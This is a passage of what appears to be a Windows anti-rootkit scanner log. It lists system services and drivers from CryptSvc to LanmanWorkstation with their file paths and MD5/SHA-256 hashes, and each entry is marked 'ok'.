12:54:40.0648 0x1004 [ 6324F0D18FB52833BA64BC828E29054C, 04118FA1BDFC512F76E4A81FEF34C78B6BD98429DB1D65123B6802B4A1E30584 ] CryptSvc C:\WINDOWS\system32\cryptsvc.dll
12:54:40.0695 0x1004 CryptSvc - ok
12:54:40.0742 0x1004 [ 389C998C64319CD97625B0550E52ECFA, DD0EDDD9C8412F78D2D2B648D67DA887C3040E05DF29F48F71299CB68FDDD0F8 ] dam C:\WINDOWS\system32\drivers\dam.sys
12:54:40.0758 0x1004 dam - ok
12:54:40.0851 0x1004 [ A6F17C299A03BAFEFB9257C462A19E00, EB68967D28355271897166D7B6FD963D1E546D3C24AE1AEAAC561F94357A9345 ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
12:54:40.0930 0x1004 DcomLaunch - ok
12:54:40.0976 0x1004 [ 95E1ABFB27F8A62ED764805775F0D2F3, 692865DA60C93481E01592883678B2C51FD9AC9A835DFB00A8E3F2DFEE7AB0ED ] defragsvc C:\WINDOWS\System32\defragsvc.dll
12:54:41.0070 0x1004 defragsvc - ok
12:54:41.0133 0x1004 [ FF086DEF5995558CCB1B5AAC2110195D, CED52FF01F9247BFDAFC5C7EFC538F8638146ED715574A422496EE0F846CB079 ] DeviceAssociationService C:\WINDOWS\system32\das.dll
12:54:41.0180 0x1004 DeviceAssociationService - ok
12:54:41.0226 0x1004 [ 2C02AFF8383D893F8DBEB07A84F6E77C, 7CC34BAC67E2988E3D16DD6EB6F6785CD2460E3EF7FBD0BD5F86E49793BD473E ] DeviceInstall C:\WINDOWS\system32\umpnpmgr.dll
12:54:41.0258 0x1004 DeviceInstall - ok
12:54:41.0351 0x1004 [ A03F362C5557E238CBFA914689C77248, BAD0A1124E6A384C15028FBE121ADF650F7716442555AD3737B9EA1F58A69246 ] Dfsc C:\WINDOWS\system32\Drivers\dfsc.sys
12:54:41.0398 0x1004 Dfsc - ok
12:54:41.0445 0x1004 [ 73BDD44A6088916964945886F9025409, 8E2ECC9AAEF3C6EBA2E61D25F657FDFCC72AB517CC4FD5FFF992E1F9EB942662 ] dg_ssudbus C:\WINDOWS\system32\DRIVERS\ssudbus.sys
12:54:41.0461 0x1004 dg_ssudbus - ok
12:54:41.0492 0x1004 [ 3EEAADA3125431980E5804ED7143458A, 381E12C83E3211C255B321D35536F4049D67E31061F8D82155E4D4509E97F43D ] Dhcp C:\WINDOWS\system32\dhcpcore.dll
12:54:41.0586 0x1004 Dhcp - ok
12:54:41.0648 0x1004 [ 21EDAD8188372C912B7BB9B1C6CB0D38, 4A102745DE8A2A82D2C069B30503BF9FF2312A035A82854F84EF9C27E3533CEE ] DiagTrack C:\WINDOWS\system32\diagtrack.dll
12:54:41.0742 0x1004 DiagTrack - ok
12:54:41.0773 0x1004 [ 4D40C9B33F738797CF50E77CB7C53E85, 7BA341342A47DEB15B51971C97A5237ACD8BDAD9033F63DF0000892BE43F8E13 ] disk C:\WINDOWS\system32\drivers\disk.sys
12:54:41.0789 0x1004 disk - ok
12:54:41.0820 0x1004 [ EB70A894708D1BC176AFD690FF06085F, 0DD2A97F5E1B38D1F7C0D44E50F09EA222B18B3B074CC9C8CD25A7526CB1A112 ] dmvsc C:\WINDOWS\System32\drivers\dmvsc.sys
12:54:41.0883 0x1004 dmvsc - ok
12:54:41.0898 0x1004 [ E9AE4FAE83FB38A2962F9032B24CEB3C, CC7D2D8C97CB779791613D76D6E4AF5D628C948C28BAC584C3C7F6A5A6036FBA ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
12:54:41.0961 0x1004 Dnscache - ok
12:54:41.0992 0x1004 [ 811EACBCC7C51A03AE11F13CC27B2AB6, FAB94F84950FFB7D3649BAFB8D96D43B880D7FDE8D5B879472AE26C4BC4203B0 ] dot3svc C:\WINDOWS\System32\dot3svc.dll
12:54:42.0039 0x1004 dot3svc - ok
12:54:42.0102 0x1004 [ B99CB575986789A93A683DCF292A43A1, 6ACEA31C723B74003E106FC8303542FCC6DBC4952B6B523F6590D006BE57238D ] DPS C:\WINDOWS\system32\dps.dll
12:54:42.0117 0x1004 DPS - ok
12:54:42.0148 0x1004 [ 00C594D5A1DBD22AD8B2902B9F6EFF94, 2920D62B5F7C49A8AFA80FCAD1E834BBAA670AEBDD7E6F21F0496D1D3CCB4E90 ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
12:54:42.0164 0x1004 drmkaud - ok
12:54:42.0242 0x1004 [ 29CCFF428E5EB70AE429C3DA8968E1EC, 8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F ] DrvAgent64 C:\WINDOWS\SysWOW64\Drivers\DrvAgent64.SYS
12:54:42.0258 0x1004 DrvAgent64 - ok
12:54:42.0289 0x1004 [ 263625A4F616538EB867B6306A6590DB, 2A064720C247EAA3446EFDCC9E01D84CBA875905D78DFED0FBD62D1EE422D416 ] DsmSvc C:\WINDOWS\System32\DeviceSetupManager.dll
12:54:42.0320 0x1004 DsmSvc - ok
12:54:42.0383 0x1004 [ E1BB0B6F00F470B451AB45EA13EBA0B3, 3A2FC2175B69A5EB98D6C2D563DBFDCB320647AB87A14E47FAE800423DCACDAB ] DXGKrnl C:\WINDOWS\System32\drivers\dxgkrnl.sys
12:54:42.0477 0x1004 DXGKrnl - ok
12:54:42.0523 0x1004 [ E253530BD5EDE28F1FF6AF93C4D8034D, 787A70C3E946348F066FB8EB81FCE60157217D93FD78ADC631B5835E8D76A253 ] Eaphost C:\WINDOWS\System32\eapsvc.dll
12:54:42.0555 0x1004 Eaphost - ok
12:54:42.0680 0x1004 [ 114BCFDF367FF37C3F1B0A96AF542E4D, D385BC1D91BC1406091C8C3691C07A90BD60EDE05B1384E5AA3506FCB909C857 ] ebdrv C:\WINDOWS\system32\drivers\evbda.sys
12:54:42.0820 0x1004 ebdrv - ok
12:54:42.0867 0x1004 [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] EFS C:\WINDOWS\System32\lsass.exe
12:54:42.0867 0x1004 EFS - ok
12:54:42.0883 0x1004 [ 43531A5993380CC5113242C29D265FD9, EE0076D96F7F3CF29884AC7A67C08A429115A7201354A1FB5DE45FD63ABB4960 ] EhStorClass C:\WINDOWS\system32\drivers\EhStorClass.sys
12:54:42.0914 0x1004 EhStorClass - ok
12:54:42.0945 0x1004 [ 6F8E738A9505A388B1157FDDE7B3101B, 3696CA634102B41EEA11EB9DCA0B24439D8636AED4A7190C138C5E64A2EFB514 ] EhStorTcgDrv C:\WINDOWS\system32\drivers\EhStorTcgDrv.sys
12:54:42.0961 0x1004 EhStorTcgDrv - ok
12:54:43.0102 0x1004 [ 138690A45CE2EE341D00A86AFF44D95F, 79230ED8285E5A9FCB7A6C3EFE64E1BAEBC64018394F9E8849A493F4ADA5C006 ] ePowerSvc C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
12:54:43.0117 0x1004 ePowerSvc - ok
12:54:43.0227 0x1004 [ 649A7B20A642BC2457E09EC3BB501CFC, E05DDCDE327FB97C161A51D17D9F5817D00CF7577070BE481D9C747CE10BAE22 ] EpsonCustomerResearchParticipation C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe
12:54:43.0258 0x1004 EpsonCustomerResearchParticipation - ok
12:54:43.0305 0x1004 [ 20ECD0A490A121CB34F553FAD1DBBD39, 17C9DA33E78FBC7582B0AA53C611929B80FBBE1343B84A179D515B51C964D218 ] EpsonScanSvc C:\Windows\system32\EscSvc64.exe
12:54:43.0305 0x1004 EpsonScanSvc - ok
12:54:43.0367 0x1004 [ 194E8100D57FC13BEF88129BAAD07E46, 745D24ADD99ED182FCCA30C6B85167484B74D3EFD631AF92AA57AAD73F474631 ] EPSON_PM_RPCV4_04 C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
12:54:43.0383 0x1004 EPSON_PM_RPCV4_04 - ok
12:54:43.0398 0x1004 [ DFFFAE1442BA4076E18EED5E406FA0D3, 329FC6FB8D14BEACDBE2A5D4C496EDEA485E838B1DF27566E278F8F8E0D8E82E ] ErrDev C:\WINDOWS\System32\drivers\errdev.sys
12:54:43.0430 0x1004 ErrDev - ok
12:54:43.0477 0x1004 [ 9CB5DAEDEC3C7CCD5FAFA263A75B363C, F181A5704CD6ACEBCC9D912EA34FD8103387B48310613A1E0D453C590483886A ] ETD C:\WINDOWS\system32\DRIVERS\ETD.sys
12:54:43.0492 0x1004 ETD - ok
12:54:43.0555 0x1004 [ F00C593994D57C75273F820653440536, 2DC986D9890EC907405FB2045E6F55ACC384169B45F0B56CCB1A953CF71D9A5D ] EventSystem C:\WINDOWS\system32\es.dll
12:54:43.0602 0x1004 EventSystem - ok
12:54:43.0633 0x1004 [ 7729D294A555C7AEB281ED8E4D0E01E4, 7269E79D72CCE477AC108294D0DDFB59CF533B03C587599C5AB0507C43A0B6D4 ] exfat C:\WINDOWS\system32\drivers\exfat.sys
12:54:43.0695 0x1004 exfat - ok
12:54:43.0727 0x1004 [ 7C4E0D5900B2A1D11EDD626D6DDB937B, 732F310F8F6016C56F432A81636B13CE0124A802FE8DD91287B618EED22C9A1D ] fastfat C:\WINDOWS\system32\drivers\fastfat.sys
12:54:43.0742 0x1004 fastfat - ok
12:54:43.0805 0x1004 [ 304B6AEC4639A7CCCCF544C6BA6177B2, B75CDD52FD3890B3008E06C503945D1E36478F0EC5E067C8DBC2822D7935D24B ] Fax C:\WINDOWS\system32\fxssvc.exe
12:54:43.0867 0x1004 Fax - ok
12:54:43.0914 0x1004 [ 5D8402613E778B3BD45E687A8372710B, EE9EA10805168D309A609B9019AEC5961EE46D18207B5E0EA2DE4064A5770AF8 ] fdc C:\WINDOWS\System32\drivers\fdc.sys
12:54:43.0945 0x1004 fdc - ok
12:54:43.0977 0x1004 [ 020D2F29009F893ADEFF4405B4B44565, 9F8501064C72933D1442DA00E70392B30D0207EB7D60F50E6648FF363799E6F1 ] fdPHost C:\WINDOWS\system32\fdPHost.dll
12:54:44.0023 0x1004 fdPHost - ok
12:54:44.0055 0x1004 [ E80D2EDD2F88B6E20076A0A4F5A5A245, E3CD6E0BE152B22E8A7340EFFD10CCDB1B632CD3EDF487E83F697D2E22A7D594 ] FDResPub C:\WINDOWS\system32\fdrespub.dll
12:54:44.0086 0x1004 FDResPub - ok
12:54:44.0117 0x1004 [ 47AB7D16EDE434B934AA4D661456C2D5, D375A92FB3E4BB0A8DA5270DACC888E53FB9F514516039FE6DAE4D4EF6B9A970 ] fhsvc C:\WINDOWS\system32\fhsvc.dll
12:54:44.0180 0x1004 fhsvc - ok
12:54:44.0211 0x1004 [ BCFD8B149B3ADF92D0DB1E909CAF0265, 002B085C131473642450176B4B8359F3E5B04350AFB659B9C0F9EB587D1181E7 ] FileInfo C:\WINDOWS\system32\drivers\fileinfo.sys
12:54:44.0227 0x1004 FileInfo - ok
12:54:44.0258 0x1004 [ A1A66C4FDAFD6B0289523232AFB7D8AF, 0F5832F626BB62190D5F3A088CE6E048D8A400CCF9EA527F06973CAD96D3A81C ] Filetrace C:\WINDOWS\system32\drivers\filetrace.sys
12:54:44.0289 0x1004 Filetrace - ok
12:54:44.0305 0x1004 [ BE743083CF7063C486A4398E3AEFE59A, 85796D89943DD6FE3932C1ED6CF01470C1B4DFD243C390B07055FFDA3C231551 ] flpydisk C:\WINDOWS\System32\drivers\flpydisk.sys
12:54:44.0336 0x1004 flpydisk - ok
12:54:44.0383 0x1004 [ C1FB505A73FA2E9019D32444AB33B75A, 765F0635C18295855CA4C0394192E8B94BA2EA1C4D74F86B720358ABA019FFAA ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
12:54:44.0398 0x1004 FltMgr - ok
12:54:44.0445 0x1004 [ 2F225BC85B84C04EA01BAB8D8DACFA83, 1F6E20C8F0FFD3FA60BDF556FB8392FE014E6519C3F314D1D22D394DB2A040CA ] FontCache C:\WINDOWS\system32\FntCache.dll
12:54:44.0555 0x1004 FontCache - ok
12:54:44.0680 0x1004 [ 1C52387BF5A127F5F3BFB31288F30D93, 90D13F60170CD74304F3036A90D596AA3E1E134455A780310BDF67AC7815F2E7 ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
12:54:44.0695 0x1004 FontCache3.0.0.0 - ok
12:54:44.0711 0x1004 [ A7C31B168F371E8E6796219F23E354DB, C51C9BF568F1E96CBBE57D2432B38F93F40520086DDB6AAAAC48CBCD1691B441 ] FsDepends C:\WINDOWS\system32\drivers\FsDepends.sys
12:54:44.0727 0x1004 FsDepends - ok
12:54:44.0727 0x1004 [ 09F460AFEDCA03F3BF6E07D1CCC9AC42, B832091BC9B2C2FE38A4BCA132ABB58251E851F21EC6F39636E73777AB9A5791 ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
12:54:44.0742 0x1004 Fs_Rec - ok
12:54:44.0820 0x1004 Fuelf - ok
12:54:44.0883 0x1004 [ F152D55E497E12256290C43B31C7D0CE, FFC54B14CCFBC1548948C07FB3866E40A11D0C05AC352BD000E71CEF053F6A6E ] fvevol C:\WINDOWS\system32\DRIVERS\fvevol.sys
12:54:44.0899 0x1004 fvevol - ok
12:54:44.0945 0x1004 [ 9591D0B9351ED489EAFD9D1CE52A8015, AC64C236C3AE545FCE8ED44A4A87FB86265A453BA60026EC9A4DE2B631E99996 ] FxPPM C:\WINDOWS\System32\drivers\fxppm.sys
12:54:44.0977 0x1004 FxPPM - ok
12:54:44.0992 0x1004 [ FC3EF65EE20D39F8749C2218DBA681CA, 12980F1DE99B25E6920A33556F3ABDA5EC9BFE4757BE602130B5E939D8D25CE3 ] gagp30kx C:\WINDOWS\system32\drivers\gagp30kx.sys
12:54:45.0008 0x1004 gagp30kx - ok
12:54:45.0039 0x1004 [ 0BF5CAD281E25F1418E5B8875DC5ADD1, 0929AD8437DD78234553D8B2CDF0D6838FD54ACDE1918AFEBE48684EB32A07A3 ] gencounter C:\WINDOWS\System32\drivers\vmgencounter.sys
12:54:45.0070 0x1004 gencounter - ok
12:54:45.0117 0x1004 [ 8DF1254093B5C354CE725EB6B9B0DE19, DE6C5661CC076DA44B8A5D044FDB7280EDCF38D322A98C14FDC82E25586B3014 ] GPIOClx0101 C:\WINDOWS\system32\Drivers\msgpioclx.sys
12:54:45.0133 0x1004 GPIOClx0101 - ok
12:54:45.0180 0x1004 [ 0D03F87D4FF4ADBAF8336DD80548155A, BC10CFA88EA2F41A8D96CB810B7953A4C168B79273A3E804A9F020F49AB58CD3 ] gpsvc C:\WINDOWS\System32\gpsvc.dll
12:54:45.0274 0x1004 gpsvc - ok
12:54:45.0289 0x1004 [ D4B7ED39C7900384D9E5C1283F1E7926, F93F98858067B40F1C071EAD0F8E85442A78B95342BC692AF4D726540634923F ] HDAudBus C:\WINDOWS\System32\drivers\HDAudBus.sys
12:54:45.0352 0x1004 HDAudBus - ok
12:54:45.0383 0x1004 [ 10A70BC1871CD955D85CD88372724906, 2480A74854D0A89FF028EE9BA41224D4B2F9B0863066BFC43097920794FEE08D ] HidBatt C:\WINDOWS\System32\drivers\HidBatt.sys
12:54:45.0399 0x1004 HidBatt - ok
12:54:45.0445 0x1004 [ 42F88B57CAE42FC10059C887B3FCFCEA, 9363AA2B8E839A6935A7C6A36C491938DF78024886DCCE6D29CB18E1D6A6D806 ] HidBth C:\WINDOWS\System32\drivers\hidbth.sys
12:54:45.0461 0x1004 HidBth - ok
12:54:45.0492 0x1004 [ C241A8BAFBBFC90176EA0F5240EACC17, 571E20B87818618BE9179986177D55739A240F04D1F740B3C1B7809B9427B767 ] hidi2c C:\WINDOWS\System32\drivers\hidi2c.sys
12:54:45.0508 0x1004 hidi2c - ok
12:54:45.0539 0x1004 [ 9BDDEE26255421017E161CCB9D5EDA95, B766FD5E31708F29384F69418FC33C4BCC6E3064AA553D5B1D30EE0B8B1BFB40 ] HidIr C:\WINDOWS\System32\drivers\hidir.sys
12:54:45.0555 0x1004 HidIr - ok
12:54:45.0586 0x1004 [ EA85B5093DF7B5C3E80362B053740AE2, 1D4251385402A2ADEE8FA1642F54180304F88337DA74989BDE44025ABB145FE5 ] hidserv C:\WINDOWS\system32\hidserv.dll
12:54:45.0633 0x1004 hidserv - ok
12:54:45.0680 0x1004 [ 8DB8EAB9D0C6A5DF0BDCADEA239220B4, EDA23E6909EB83E5E148816DFB16CC29EA01BD6BD2F73AA46B3D820B85FB9C83 ] HidUsb C:\WINDOWS\System32\drivers\hidusb.sys
12:54:45.0742 0x1004 HidUsb - ok
12:54:45.0789 0x1004 [ 93C4315F47F8D635C6DB0DF49FCE10EE, 70C52B8927D54ACD23F27948780B522974250FD5CD81AA9801C3F158C402889F ] hkmsvc C:\WINDOWS\system32\kmsvc.dll
12:54:45.0867 0x1004 hkmsvc - ok
12:54:45.0899 0x1004 [ AC49522ED106BD4B545D6614D71C2445, 40BD738A301170378ECFC031635EB04E2F812B676376CADDD6607ECABEC9255F ] HomeGroupListener C:\WINDOWS\system32\ListSvc.dll
12:54:45.0945 0x1004 HomeGroupListener - ok
12:54:45.0977 0x1004 [ 99932E30CE0283B73BB6E5019E150394, 1F88C2F56A7B8E1F75E6359281F418F9661DA4FB7B7D7B14FA7F718B15D4DCE0 ] HomeGroupProvider C:\WINDOWS\system32\provsvc.dll
12:54:46.0024 0x1004 HomeGroupProvider - ok
12:54:46.0070 0x1004 [ A6AACEA4C785789BDA5912AD1FEDA80D, D197012A5DA6AB3F76FF298336DF0CF027C07ECC71267BAEF5912DE12893E096 ] HpSAMD C:\WINDOWS\system32\drivers\HpSAMD.sys
12:54:46.0086 0x1004 HpSAMD - ok
12:54:46.0133 0x1004 [ E87A6D3B8FECD5B93BC0CFBB48C27970, 55C49B6F3822450447C082B40A263F3370694DB53AD0018ADEB911E4A9F65A88 ] HTTP C:\WINDOWS\system32\drivers\HTTP.sys
12:54:46.0180 0x1004 HTTP - ok
12:54:46.0227 0x1004 [ 90656C0B3864804B090434EFC582404F, BDB60050B729AACB9E009AC7129BEBD6298BBD8A9DB14B817D02E8E13669BD6E ] hwpolicy C:\WINDOWS\system32\drivers\hwpolicy.sys
12:54:46.0242 0x1004 hwpolicy - ok
12:54:46.0258 0x1004 [ 6D6F9E3BF0484967E52F7E846BFF1CA1, C982966BDE6A3E6773D9441ADA7A3B08D13511DFC68D04DF303248B942423F38 ] hyperkbd C:\WINDOWS\System32\drivers\hyperkbd.sys
12:54:46.0289 0x1004 hyperkbd - ok
12:54:46.0305 0x1004 [ 907C870F8C31F8DDD6F090857B46AB25, 308664A31717383D06185875E76C6612407A9F04E7DB28404F574A5706C6715D ] HyperVideo C:\WINDOWS\system32\DRIVERS\HyperVideo.sys
12:54:46.0320 0x1004 HyperVideo - ok
12:54:46.0367 0x1004 [ 49EE0AE9E5B64FFBBD06D55C4984B598, 8866627F9241B24A59C81D8BCC67A4DCA87576F589599BA291D0E323F679EB4D ] i8042prt C:\WINDOWS\System32\drivers\i8042prt.sys
12:54:46.0430 0x1004 i8042prt - ok
12:54:46.0461 0x1004 [ 5D90E32E36CE5D4C535D17CE08AEAF05, 976A463343E8C8308AFBE9E64DF56C430D2241DE002430D00318AB065EB72E4A ] iaLPSSi_GPIO C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys
12:54:46.0461 0x1004 iaLPSSi_GPIO - ok
12:54:46.0477 0x1004 [ DD05E7E80F52ADE9AEB292819920F32C, E71AB6A50B0F90C8F94569CE89F66F915A0A4A00D4AC091B2E5E750D88CFC334 ] iaLPSSi_I2C C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys
12:54:46.0492 0x1004 iaLPSSi_I2C - ok
12:54:46.0539 0x1004 [ FA4C48E36F0B24E7E33D3E7E1844B9C9, F61F448B8E305DEFDDA5D4A6FC4E57C798C11ED4DA0ACB885847DC8A9A7B4E98 ] iaStorA C:\WINDOWS\system32\drivers\iaStorA.sys
12:54:46.0570 0x1004 iaStorA - ok
12:54:46.0602 0x1004 [ 08BFE413B0B4AA8DFA4B5684CE06D3DC, 95DEEBB203E12EE6E191F5247A74C04AEC0E16DE981FADDC4D6C42EE41D8D079 ] iaStorAV C:\WINDOWS\system32\drivers\iaStorAV.sys
12:54:46.0633 0x1004 iaStorAV - ok
12:54:46.0649 0x1004 [ A2200C3033FA4EF249FC096A7A7D02A2, 5819F5C2020DE2EEE339B0C08CD4B1E3490EAFBBEA1277CE649DB5A5150986B0 ] iaStorV C:\WINDOWS\system32\drivers\iaStorV.sys
12:54:46.0664 0x1004 iaStorV - ok
12:54:46.0695 0x1004 IDriverT - ok
12:54:46.0695 0x1004 IEEtwCollectorService - ok
12:54:46.0867 0x1004 [ 076023219E918D34585B231029A44571, C2AB0DE0D80D0BC6595C9F9655A890531E7952599714DC03B4ECB46947D833A8 ] igfx C:\WINDOWS\system32\DRIVERS\igdkmd64.sys
12:54:47.0102 0x1004 igfx - ok
12:54:47.0133 0x1004 [ C814D4A0B7B91E936B2DC0828C69ACAB, A19B503CB3C598474C61DA6F1AC087CCF287F7523D2F932B21EF21E7CA1809B1 ] igfxCUIService1.0.0.0 C:\WINDOWS\system32\igfxCUIService.exe
12:54:47.0149 0x1004 igfxCUIService1.0.0.0 - ok
12:54:47.0211 0x1004 [ AF8A43C376F83A4A1E7DA16461EDE114, EBA10519B074888355A4FC11D52FF1E6A52F88F754B7F1F9863A8313638645CB ] IKEEXT C:\WINDOWS\System32\ikeext.dll
12:54:47.0258 0x1004 IKEEXT - ok
12:54:47.0289 0x1004 [ FC7C456AF9B9811499EDBD10616832EE, CA2D8B0E672D3AE449C2FF0B9E142D74E8C72FD877D11162A9F7CC51AF58220F ] intaud_WaveExtensible C:\WINDOWS\system32\drivers\intelaud.sys
12:54:47.0305 0x1004 intaud_WaveExtensible - ok
12:54:47.0414 0x1004 [ 6237A7F235E7BB3D4FAFB7E71B0D6EC1, 5FC6A225BDFEA3461713C16F4A2EAA1728E2D1AEDDFFB4165833EB0D82A99B31 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RTKVHD64.sys
12:54:47.0539 0x1004 IntcAzAudAddService - ok
12:54:47.0633 0x1004 [ F5495B38BFB9149925F54F65AB40EFBF, 7CBB72C41E2343DACBFB967A39CA04788561EDECB289C41BC2D6A06B80882AC4 ] IntcDAud C:\WINDOWS\system32\DRIVERS\IntcDAud.sys
12:54:47.0664 0x1004 IntcDAud - ok
12:54:47.0727 0x1004 [ B353F1834FCD36D77BE3F74992C147D4, BFBC42B500FC7D6D2B523F988DD54156D2B6132CBE366EB591BF45556959A8E9 ] Intel(R) Capability Licensing Service Interface C:\Program Files\Intel\iCLS Client\HeciServer.exe
12:54:47.0742 0x1004 Intel(R) Capability Licensing Service Interface - ok
12:54:47.0789 0x1004 [ 5175C772BCD11C9B0471D30535F15F60, 1F3740ECE66A3F849445DE3A15648BCCC8CB349300C449F107FC762D2B792F0B ] Intel(R) ME Service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
12:54:47.0805 0x1004 Intel(R) ME Service - ok
12:54:47.0821 0x1004 [ 4E448FCFFD00E8D657CD9E48D3E47157, 4A958CF0BF8DAEAE5E008500BA67CE89B21388592811274331EE39CAC1043A00 ] intelide C:\WINDOWS\system32\drivers\intelide.sys
12:54:47.0836 0x1004 intelide - ok
12:54:47.0867 0x1004 [ 7AA01AB1C110916825E6E1389F1B9AF2, E2885955AFA0908E194B1BC364C9582249B2B2AFFF93F17F3414F55B1E5F2C42 ] intelpep C:\WINDOWS\system32\drivers\intelpep.sys
12:54:47.0867 0x1004 intelpep - ok
12:54:47.0914 0x1004 [ 47E74A8E53C7C24DCE38311E1451C1D9, 79B06E37A552C8A847404D4C572CDB8CF525354D8AE3BEBC06892B7C3B330761 ] intelppm C:\WINDOWS\System32\drivers\intelppm.sys
12:54:47.0930 0x1004 intelppm - ok
12:54:47.0961 0x1004 [ 9DB76D7F9E4E53EFE5DD8C53DE837514, 07BA4EDA9BE9139A689A2C3EFC1D1A4F3D1216625ED145F313398292A2CD5703 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
12:54:47.0992 0x1004 IpFilterDriver - ok
12:54:48.0055 0x1004 [ A5800036E4EA06697A34742A24ACFBE1, BA67060526E9213000B4206F86A74F904999AD7018EFCBE4FE9708650DA9D973 ] iphlpsvc C:\WINDOWS\System32\iphlpsvc.dll
12:54:48.0133 0x1004 iphlpsvc - ok
12:54:48.0180 0x1004 [ 9C096BF5E10CA8BFA56F32522A89FAF1, 6C1151160799338DA351C7237AB049926C6C15F24F5E154BBF5929B4A96C0B8D ] IPMIDRV C:\WINDOWS\System32\drivers\IPMIDrv.sys
12:54:48.0227 0x1004 IPMIDRV - ok
12:54:48.0258 0x1004 [ B7342B3C58E91107F6E946A93D9D4EFD, D5DA3C02C5C5A343785745EF6983CC9B5FBD3FB8D49FE9B450523E50212D1A32 ] IPNAT C:\WINDOWS\system32\drivers\ipnat.sys
12:54:48.0274 0x1004 IPNAT - ok
12:54:48.0289 0x1004 [ AE44C526AB5F8A487D941CEB57B10C97, A783A2EAF7A6FF450FB3F189A5930036FA60D125C42171AC44B6FE2E3DBD6F7A ] IRENUM C:\WINDOWS\system32\drivers\irenum.sys
12:54:48.0321 0x1004 IRENUM - ok
12:54:48.0336 0x1004 [ 8AFEEA3955AA43616A60F133B1D25F21, E99359A4F1D653790133F145CF7C9F97399FD75C5E135AA7E5F989BB660789AF ] isapnp C:\WINDOWS\system32\drivers\isapnp.sys
12:54:48.0352 0x1004 isapnp - ok
12:54:48.0383 0x1004 [ D90AB68D0FAC9F357F663670FDBB511E, A82AAA5DF1B38EFBDCF834535A0C520D1BB2D7A4A906C18CFDD22BCF16BDB97D ] iScsiPrt C:\WINDOWS\System32\drivers\msiscsi.sys
12:54:48.0399 0x1004 iScsiPrt - ok
12:54:48.0430 0x1004 [ A90C843F4FDD7A07129BA73C6BE13976, A76DEA9F09E3B2F18D3B646A0DD39E2773EC62E2F3C55421BA61C12190D78C1C ] iwdbus C:\WINDOWS\System32\drivers\iwdbus.sys
12:54:48.0430 0x1004 iwdbus - ok
12:54:48.0477 0x1004 [ B2AAF45E83CAFA49A34EB2F2D6D7609C, 1AE9FEE38D295F485165F2BA53F2D7CED5D9845D98F9EAC23ABF2244D3CB1D96 ] jhi_service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
12:54:48.0492 0x1004 jhi_service - ok
12:54:48.0524 0x1004 [ 5917AFE4A3F695A54B99C1849C8207FE, DD57638966F2F0387DCF9DA4BBAEE3CDD8CC6F1A2D49581A0374D46A565BED4F ] kbdclass C:\WINDOWS\System32\drivers\kbdclass.sys
12:54:48.0539 0x1004 kbdclass - ok
12:54:48.0586 0x1004 [ 8CD840A062F6BDF41DDE3ACB96164B72, AEAE867F3557C1CE6B931E19D7144A3BD3CBABD81B1542667680D54FC24DEBE1 ] kbdhid C:\WINDOWS\System32\drivers\kbdhid.sys
12:54:48.0586 0x1004 kbdhid - ok
12:54:48.0633 0x1004 [ 813871C7D402A05F2E3A7075F9584A05, FF0C2F87EB083F8CE74C679D80C845CDFBFBBC70BE818F899F3336BBB54A3FFB ] kdnic C:\WINDOWS\system32\DRIVERS\kdnic.sys
12:54:48.0680 0x1004 kdnic - ok
12:54:48.0696 0x1004 [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] KeyIso C:\WINDOWS\system32\lsass.exe
12:54:48.0711 0x1004 KeyIso - ok
12:54:48.0727 0x1004 [ 07071C1E3CD8F0F9114AAC8B072CA1E5, F72E49D9A77BBE28B135D5DDBD9037083D90400A6D61DA45B5D53C4ACFFAF932 ] KMWDFILTER C:\WINDOWS\System32\drivers\KMWDFILTER.sys
12:54:48.0742 0x1004 KMWDFILTER - ok
12:54:48.0852 0x1004 [ 4E829B18D5BAEC29893792A3C671A847, 64C3B99F53A9D1ACA802B46B09E820AD210B667D5A1CD0ADAF1F12944B15B52E ] KSecDD C:\WINDOWS\system32\Drivers\ksecdd.sys
12:54:48.0867 0x1004 KSecDD - ok
12:54:48.0899 0x1004 [ 35C19AF2116F67914712D7C4CBE47B8C, 5F976726880A6E51D7ABFA7E3EF7294C6FB7F383DC5710A2C2EC8DD26DAEC204 ] KSecPkg C:\WINDOWS\system32\Drivers\ksecpkg.sys
12:54:48.0930 0x1004 KSecPkg - ok
12:54:48.0930 0x1004 [ 11AFB527AA370B1DAFD5C36F35F6D45F, 757AD234284467ADB826F7CA0251F58D48866B91995BC867DEA4BAF676947163 ] ksthunk C:\WINDOWS\system32\drivers\ksthunk.sys
12:54:48.0992 0x1004 ksthunk - ok
12:54:49.0039 0x1004 [ C1591A66028C71147A3E2EAB0B1CCB7E, 82F3D5DCC1614398A144D9791E4BAA814DBA9112677341FD57D5E9834CEDEB41 ] KtmRm C:\WINDOWS\system32\msdtckrm.dll
12:54:49.0071 0x1004 KtmRm - ok
12:54:49.0102 0x1004 [ CA2828DDE4B09FEFFDB7CE68B3D8D00A, B514792FF1EF36C678BB51644A1C420105D5E2CD6DD5A89A3FB252D08277A40C ] LanmanServer C:\WINDOWS\system32\srvsvc.dll
12:54:49.0164 0x1004 LanmanServer - ok
12:54:49.0196 0x1004 [ 3DBD9100745F9B8506B8FEC6FE6CCDE3, C3EF2856A1680AFDE133887E48946CF9CAB6755C3BDC07F0326965DCD4096F62 ] LanmanWorkstation C:\WINDOWS\System32\wkssvc.dll
12:54:49.0227 0x1004 LanmanWorkstation - ok
